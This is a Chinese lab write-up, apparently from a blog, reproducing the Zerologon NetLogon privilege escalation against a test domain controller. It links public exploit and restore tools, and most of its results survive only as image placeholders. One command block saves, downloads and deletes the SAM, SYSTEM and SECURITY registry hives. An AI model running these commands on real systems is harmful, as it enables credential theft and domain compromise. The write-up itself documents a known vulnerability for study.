CVE-1472

简介: 0x00 CVE-1472复现

NetLogon 特权提升漏洞

   NetLogon组件 是 Windows 上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,同时还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。

当攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的易受攻击的 Netlogon 安全通道时,存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络中的设备上运行经特殊设计的应用程序。

环境:

1.攻击机kali20202.靶机win2008r2---ip:192.168.124.141---主机名字:dc-01 ---域名:test.com3.复现工具:https://github.com/dirkjanm/CVE-2020-14724.所需环境:python3+impacket包https://github.com/SecureAuthCorp/impacket5.恢复工具:https://github.com/risksense/zerologon

0x01 复现过程

  1. 下载复现工具,进行检验

640.png

  2.获取hash值

安装impacket包

需要使用如下步骤:

git clonehttps://github.com/CoreSecurity/impacket.git
cd impacket/
python setup.py install

在刚才下载的包里面

impacket-master/examples

获取空口令

640.png

获取hash值

640.png

640.png

3.   获取shell

640.png

4.   获取域控的原始NT哈希

先在shell中执行以下命令,获取域控账户的注册表文件

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save

640.png

在执行以下命令获取原始NT哈希

640.png

0x02.恢复

恢复脚本https://github.com/risksense/zerologon

恢复需要使用哈希使用$MACHINE.ACC: 后的参数

相关文章
|
编解码 编译器
项目实战——Qt实现FFmpeg音视频转码器(一)
项目实战——Qt实现FFmpeg音视频转码器(一)
692 0
|
域名解析 网络协议 安全
信息收集的工具你听过几种(盘点信息收集)
信息收集的工具你听过几种(盘点信息收集)
信息收集的工具你听过几种(盘点信息收集)
|
数据可视化 PyTorch 算法框架/工具
使用PyTorch搭建VGG模型进行图像风格迁移实战(附源码和数据集)
使用PyTorch搭建VGG模型进行图像风格迁移实战(附源码和数据集)
1563 1
|
机器学习/深度学习 人工智能 自然语言处理
如何使用ChatGPT制作免费的数字人
如何使用ChatGPT制作免费的数字人
890 0
Visual Studio 简易打包工具的安装与使用
Visual Studio 简易打包工具的安装与使用
|
安全 前端开发 JavaScript
uni-app进阶之https请求方式/状态管理【day11】
uni-app进阶之https请求方式/状态管理【day11】
uni-app进阶之https请求方式/状态管理【day11】
|
关系型数据库 MySQL
Mysql中count(1)、count(*)以及count(列)的区别
Mysql中count(1)、count(*)以及count(列)的区别
684 0
uniCloud 的 schema2code 【实用教程】
uniCloud 的 schema2code 【实用教程】
493 0
|
Java 数据库连接 数据库
【MyBatis】tkMapper 插件
【1月更文挑战第14天】【MyBatis】tkMapper 插件
|
测试技术 Python